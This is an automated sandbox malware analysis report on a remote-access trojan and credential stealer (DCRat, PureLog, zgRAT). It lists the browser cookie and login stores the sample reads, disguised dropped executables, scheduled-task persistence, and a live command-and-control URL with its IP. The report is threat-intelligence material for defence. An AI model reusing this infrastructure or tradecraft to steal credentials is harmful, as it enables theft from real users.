                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State

                                    Remote Access Functionality

                                    Source: Yara match, File source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: Process Memory Space: serverDll.exe PID: 5300, type: MEMORYSTR
                                    Source: Yara match, File source: HMhdtzxEHf.exe, type: SAMPLE
                                    Source: Yara match, File source: 0.3.HMhdtzxEHf.exe.6555cf3.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.HMhdtzxEHf.exe.6e5dcf3.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.HMhdtzxEHf.exe.6555cf3.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 4.0.serverDll.exe.330000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 00000000.00000003.1665452904.000000000650D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000000.00000003.1665910452.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000004.00000000.1722682939.0000000000332000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match, File source: C:\ChainbrowserNet\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Recovery\Memory Compression.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Windows\Vss\Writers\Application\upfc.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Users\Default\Videos\System.exe, type: DROPPED
                                    Source: Yara match, File source: C:\ChainbrowserNet\serverDll.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| Gather Victim Identity Information | 11 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 157 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | Login Hook | Login Hook | 1 Software Packing | NTDS | 351 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 32 Masquerading | Cached Domain Credentials | 251 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 251 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                                    [Behavior graph. Behavior Graph ID: 1584128; Sample: HMhdtzxEHf.exe; Start date: 04/01/2025; Architecture: WINDOWS; Score: 100]

                                    Source | Detection | Scanner | Label
                                    HMhdtzxEHf.exe | 73% | Virustotal |
                                    HMhdtzxEHf.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
                                    HMhdtzxEHf.exe | 100% | Avira | VBS/Runner.VPG
                                    HMhdtzxEHf.exe | 100% | Joe Sandbox ML |
                                    Source | Detection | Scanner | Label
                                    C:\ChainbrowserNet\backgroundTaskHost.exe | 100% | Avira | HEUR/AGEN.1323342
                                    C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe | 100% | Avira | VBS/Runner.VPG
                                    C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe | 100% | Avira | HEUR/AGEN.1323342
                                    C:\Recovery\Memory Compression.exe | 100% | Avira | HEUR/AGEN.1323342
                                    C:\Users\Default\Videos\System.exe | 100% | Avira | HEUR/AGEN.1323342
                                    C:\ChainbrowserNet\serverDll.exe | 100% | Avira | HEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat | 100% | Avira | BAT/Delbat.C
                                    C:\ChainbrowserNet\backgroundTaskHost.exe | 100% | Joe Sandbox ML |
                                    C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe | 100% | Joe Sandbox ML |
                                    C:\Recovery\Memory Compression.exe | 100% | Joe Sandbox ML |
                                    C:\Users\Default\Videos\System.exe | 100% | Joe Sandbox ML |
                                    C:\ChainbrowserNet\serverDll.exe | 100% | Joe Sandbox ML |
                                    C:\ChainbrowserNet\backgroundTaskHost.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    C:\ChainbrowserNet\serverDll.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\Memory Compression.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Default\Videos\System.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\BnGVmWDc.log | 17% | ReversingLabs |
                                    C:\Users\user\Desktop\FEoVfgpT.log | 9% | ReversingLabs |
                                    C:\Users\user\Desktop\HBQeAgEO.log | 25% | ReversingLabs |
                                    C:\Users\user\Desktop\HQmlqEFC.log | 29% | ReversingLabs |
                                    C:\Users\user\Desktop\IkuUPlxR.log | 8% | ReversingLabs |
                                    C:\Users\user\Desktop\JYydAytP.log | 12% | ReversingLabs |
                                    C:\Users\user\Desktop\LQcCJUsI.log | 21% | ReversingLabs |
                                    C:\Users\user\Desktop\LVZlWyIJ.log | 21% | ReversingLabs |
                                    C:\Users\user\Desktop\LazCtHLF.log | 12% | ReversingLabs |
                                    C:\Users\user\Desktop\LxFcNPnz.log | 8% | ReversingLabs |
                                    C:\Users\user\Desktop\NGFBdMTC.log | 17% | ReversingLabs |
                                    C:\Users\user\Desktop\NYMTshMF.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\OQqtADLy.log | 25% | ReversingLabs |
                                    C:\Users\user\Desktop\OqULzLYx.log | 8% | ReversingLabs |
                                    C:\Users\user\Desktop\THRskbyw.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\UaZkrFKp.log | 17% | ReversingLabs |
                                    C:\Users\user\Desktop\WBUJbbcm.log | 8% | ReversingLabs |
                                    C:\Users\user\Desktop\WcMTNoOk.log | 5% | ReversingLabs |
                                    C:\Users\user\Desktop\XpYRNoYk.log | 9% | ReversingLabs |
                                    C:\Users\user\Desktop\YxtBDwFZ.log | 8% | ReversingLabs |
                                    C:\Users\user\Desktop\aBvrGPVb.log | 8% | ReversingLabs |
                                    C:\Users\user\Desktop\axWajGSg.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\biYRKJQS.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\diBqqUdY.log | 5% | ReversingLabs |
                                    C:\Users\user\Desktop\dkLAftUN.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\ermiNMVU.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\fknZLDhU.log | 29% | ReversingLabs |
                                    C:\Users\user\Desktop\hYrhxRdS.log | 25% | ReversingLabs |
                                    C:\Users\user\Desktop\hrAYEvpK.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\hzjriePQ.log | 25% | ReversingLabs |
                                    C:\Users\user\Desktop\jRHPiNPQ.log | 21% | ReversingLabs |
                                    C:\Users\user\Desktop\kOiXENdL.log | 25% | ReversingLabs |
                                    C:\Users\user\Desktop\nQUGZwiG.log | 25% | ReversingLabs |
                                    C:\Users\user\Desktop\oHiYBjVt.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\oOwOvwxB.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\qHLxhtiz.log | 8% | ReversingLabs |
                                    C:\Users\user\Desktop\rEmFCtxu.log | 8% | ReversingLabs |
                                    C:\Users\user\Desktop\riqoYKNp.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\sNXxZlqq.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\uhRxJqon.log | 21% | ReversingLabs |
                                    C:\Users\user\Desktop\xEzwJIdo.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\yCaEfIsj.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\zUjwmmDb.log | 17% | ReversingLabs |
                                    C:\Users\user\Desktop\zkTmQnyh.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\Vss\Writers\Application\upfc.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
                                    Source | Detection | Scanner | Label
                                    http://495112cm.renyash.ru/vmLineMultiUniversalwp.php | 100% | Avira URL Cloud | malware
                                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                    495112cm.renyash.ru | 104.21.38.84 | true | true | | unknown
                                    Name | Malicious | Antivirus Detection | Reputation
                                    http://495112cm.renyash.ru/vmLineMultiUniversalwp.php | true | Avira URL Cloud: malware | unknown
                                    Name | Malicious | Antivirus Detection | Reputation
                                    https://ac.ecosia.org/autocomplete?q= | false | | high
                                    https://duckduckgo.com/chrome_newtab | false | | high
                                    https://duckduckgo.com/ac/?q= | false | | high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | false | | high
                                    http://pesterbdd.com/images/Pester.png | false | | high
                                    http://schemas.xmlsoap.org/soap/encoding/ | false | | high
                                    http://www.apache.org/licenses/LICENSE-2.0.html | false | | high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | false | | high
                                    http://schemas.xmlsoap.org/wsdl/ | false | | high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | false | | high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | false | | high
                                    https://aka.ms/pscore68 | false | | high
                                    https://www.ecosia.org/newtab/ | false | | high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | false | | high
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | false | | high
                                    https://github.com/Pester/Pester | false | | high
                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                    104.21.38.84 | 495112cm.renyash.ru | United States | 13335 | CLOUDFLARENETUS | true
                                    Joe Sandbox version: 41.0.0 Charoite
                                    Analysis ID: 1584128
                                    Start date and time: 2025-01-04 11:06:07 +01:00
                                    Joe Sandbox product: CloudBasic
                                    Overall analysis duration: 0h 11m 22s
                                    Hypervisor based Inspection enabled: false
                                    Report type: full
                                    Cookbook file name: default.jbs
                                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed: 83
                                    Number of new started drivers analysed: 0
                                    Number of existing processes analysed: 0
                                    Number of existing drivers analysed: 0
                                    Number of injected processes analysed: 0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode: default
                                    Analysis stop reason: Timeout
                                    Sample name: HMhdtzxEHf.exe
                                    renamed because original name is a hash value
                                    Original Sample Name: bc8116e0b506345bf1de248886a52f86.exe
                                    Detection: MAL
                                    Classification: mal100.troj.spyw.expl.evad.winEXE@84/378@1/1
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information: Failed
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, upfc.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, schtasks.exe
                                                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 23.56.254.164, 13.107.246.45, 4.245.163.56
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target serverDll.exe, PID 5300 because it is empty
                                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:07:13 | API Interceptor | 453x Sleep call for process: powershell.exe modified
05:07:36 | API Interceptor | 1442903x Sleep call for process: backgroundTaskHost.exe modified
10:07:07 | Task Scheduler | Run new task: aaHgUfBgYBljMPbLmzgS path: "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
10:07:08 | Task Scheduler | Run new task: aaHgUfBgYBljMPbLmzgSa path: "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
10:07:09 | Task Scheduler | Run new task: backgroundTaskHost path: "C:\ChainbrowserNet\backgroundTaskHost.exe"
10:07:12 | Task Scheduler | Run new task: backgroundTaskHostb path: "C:\ChainbrowserNet\backgroundTaskHost.exe"
10:07:13 | Task Scheduler | Run new task: Memory Compression path: "C:\Recovery\Memory Compression.exe"
10:07:14 | Task Scheduler | Run new task: Memory CompressionM path: "C:\Recovery\Memory Compression.exe"
10:07:14 | Task Scheduler | Run new task: serverDll path: "C:\ChainbrowserNet\serverDll.exe"
10:07:15 | Task Scheduler | Run new task: serverDlls path: "C:\ChainbrowserNet\serverDll.exe"
10:07:15 | Task Scheduler | Run new task: System path: "C:\Users\Default User\Videos\System.exe"
10:07:16 | Task Scheduler | Run new task: SystemS path: "C:\Users\Default User\Videos\System.exe"
10:07:16 | Task Scheduler | Run new task: upfc path: "C:\Windows\Vss\Writers\Application\upfc.exe"
10:07:17 | Task Scheduler | Run new task: upfcu path: "C:\Windows\Vss\Writers\Application\upfc.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.38.84 | eP6sjvTqJa.exe | malicious | DCRat, PureLog Stealer, zgRAT | 250345cm.renyash.ru/sqltemp.php
 | GqjiKlwarV.exe | malicious | DCRat, PureLog Stealer, zgRAT | 101349cm.renyash.ru/VideovmGamedefaultTestuniversalwp.php
 | 1znAXdPcM5.exe | malicious | DCRat, PureLog Stealer, zgRAT | 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
 | YGk3y6Tdix.exe | malicious | DCRat, PureLog Stealer, zgRAT | 250345cm.renyash.ru/sqltemp.php
 | U1jaLbTw1f.exe | malicious | DCRat, PureLog Stealer, zgRAT | 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
 | ZZ2sTsJFrt.exe | malicious | DCRat, PureLog Stealer, zgRAT | 048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
 | 67VB5TS184.exe | malicious | DCRat, PureLog Stealer, zgRAT | 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
 | gkcQYEdJSO.exe | malicious | DCRat, PureLog Stealer, zgRAT | 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php
                                                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | 9g9LZNE4bH.exe | malicious | Blank Grabber | 162.159.137.232
 | riFSkYVMKB.exe | malicious | Blank Grabber | 162.159.138.232
 | 9cOUjp7ybm.exe | malicious | LummaC | 188.114.96.3
 | http://livedashboardkit.info | malicious | Unknown | 172.67.166.199
 | 4.elf | malicious | Unknown | 1.13.111.69
 | 31.13.224.14-mips-2025-01-03T22_14_18.elf | malicious | Mirai | 1.4.15.193
 | random.exe | malicious | Unknown | 188.114.96.3
 | random.exe | malicious | Unknown | 188.114.96.3
 | download.bin.exe | malicious | LummaC | 104.21.112.1
                                                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\Desktop\BnGVmWDc.log | kJrNOFEGbQ.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | VqGD18ELBM.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | f3I38kv.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | r6cRyCpdfS.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | Z4D3XAZ2jB.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | cbCjTbodwa.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | vb8DOBZQ4X.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | 6G8OR42xrB.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | XNPOazHpXF.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | 9FwQYJSj4N.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):182
                                                                                          Entropy (8bit):5.6708538473130545
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:p1UgdQh0mbEn+B/lXVQbZSKcvne0FfvLtihdREHWTMqPnDRNEh7Ou2Oiul:wgd00K/ySKcvPBWEHVqPncTNl
                                                                                          MD5:48EC5844D800C9FB05019CA09007888A
                                                                                          SHA1:DDD51A293F83B2E716DD29B362D9DCDB8A6E2C39
                                                                                          SHA-256:33CECCF70149959BAB039BBB70B75F28D5A11E5F6944E465F79CDA30DE18AF35
                                                                                          SHA-512:3EA7773D197B4D789643DF7DE737110B1CB0C9307A61EBF3A2CED9190F675FB8F2B62A36AB990740D14662E20AA832B60DE2673217D248D5C436C93D21C22AB2
                                                                                          Malicious:false
                                                                                          Preview:3psVPqmVZP85DQNkXdyztaaxJ84uaeiu97DhSpfyjZaRKFrH7vhkwFbcP4LQv154rO5FNpRr79QU9JnEQwxo6784gkSXdPCrefj6Jm4Rd0mwyGcFRH99DQ8tQBimX4Ns6i0ejq4o2fKFULFaHMGWPDoNh0qHDR4jm4zQP8gkMVGhF2ZE6IfKy1
                                                                                          Process:C:\Users\user\Desktop\HMhdtzxEHf.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):84
                                                                                          Entropy (8bit):5.065127619738712
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ykc1AaN2OqtVNCC1CGR6E9SWAX3HcXfgpF:ymOXMC/1DHcPgpF
                                                                                          MD5:378C4B8E3E02C987C26DF82F60ACDCA0
                                                                                          SHA1:4DF26C2812C895FF8238DCE01E66906B3A8C106E
                                                                                          SHA-256:4CC8662DD73C99D9420D6CF65290DA7643B10109157B7660E211EFEED9D78E62
                                                                                          SHA-512:2474E31638EE52759F8AD2BFE558714B65A123DA4CFD9E1B329CA984D1328A890B2E46F9B2C300C1E01FAAD1000E6B1B0A2982CC4879FB5D2986250A20802763
                                                                                          Malicious:false
                                                                                          Preview:%rDWobLeput%%jDUOMKkPwSGHOkC%..%EpOSggWCZp%"C:\ChainbrowserNet/serverDll.exe"%LeCjI%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainbrowserNet\backgroundTaskHost.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainbrowserNet\backgroundTaskHost.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with very long lines (320), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):320
                                                                                          Entropy (8bit):5.797289412445972
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:z3UOD3zeliszpvqSXmgAWAyctAe2WBASuDaJOrF0SE6gVhj1ew7iRysGVnu0IdVJ:DjzcpvV2lYW7aaqub6QhJF7ioNVEdS1U
                                                                                          MD5:5912D7154D2B927BA237596735495ED4
                                                                                          SHA1:E50FCF4D600B4F04AFAFBB78ABD9CE5ED8300CAE
